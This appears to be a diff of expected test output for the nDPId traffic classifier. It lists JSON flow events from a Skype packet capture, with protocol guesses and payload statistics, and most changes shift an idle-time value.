+00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970659834,"flow_last_seen":1431970689548,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51251,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970682971,"flow_last_seen":1431970692227,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51278,"dst_port":40009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970682971,"flow_last_seen":1431970692227,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51278,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970664361,"flow_last_seen":1431970664361,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970664698,"flow_last_seen":1431970664698,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.229","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970632290,"flow_last_seen":1431970632290,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431970635325,"flow_last_seen":1431970688837,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63514,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970651380,"flow_last_seen":1431970670192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":535,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970651380,"flow_last_seen":1431970670192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":535,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51239,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970651380,"flow_last_seen":1431970670192,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":535,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970651380,"flow_last_seen":1431970670192,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":535,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51239,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634731,"flow_last_seen":1431970661287,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":53372,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970651380,"flow_last_seen":1431970679713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51238,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970651380,"flow_last_seen":1431970679713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970687670,"flow_last_seen":1431970703163,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51290,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970687670,"flow_last_seen":1431970703163,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51290,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970652388,"flow_last_seen":1431970670585,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":586,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51241,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970652388,"flow_last_seen":1431970670585,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":586,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51241,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970651380,"flow_last_seen":1431970679713,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51238,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970651380,"flow_last_seen":1431970679713,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970687670,"flow_last_seen":1431970703163,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51290,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970687670,"flow_last_seen":1431970703163,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51290,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970652388,"flow_last_seen":1431970670585,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":586,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51241,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970652388,"flow_last_seen":1431970670585,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":586,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51241,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648982,"flow_last_seen":1431970679028,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648880,"flow_last_seen":1431970678946,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00616{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970688782,"flow_last_seen":1431970692885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2561,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51293,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970688782,"flow_last_seen":1431970692885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2561,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51293,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970668514,"flow_last_seen":1431970686964,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":516,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51260,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970668514,"flow_last_seen":1431970686964,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":516,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51260,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970668515,"flow_last_seen":1431970686367,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51261,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970668515,"flow_last_seen":1431970686367,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51261,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00616{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970688782,"flow_last_seen":1431970692885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2561,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51293,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970688782,"flow_last_seen":1431970692885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2561,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51293,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970668514,"flow_last_seen":1431970686964,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":516,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51260,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970668514,"flow_last_seen":1431970686964,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":516,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51260,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970668515,"flow_last_seen":1431970686367,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51261,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970668515,"flow_last_seen":1431970686367,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51261,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431970687261,"flow_last_seen":1431970707409,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"174.49.171.224","src_port":13021,"dst_port":32011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970677603,"flow_last_seen":1431970694432,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51274,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970677603,"flow_last_seen":1431970694432,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51274,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970684583,"flow_last_seen":1431970702158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 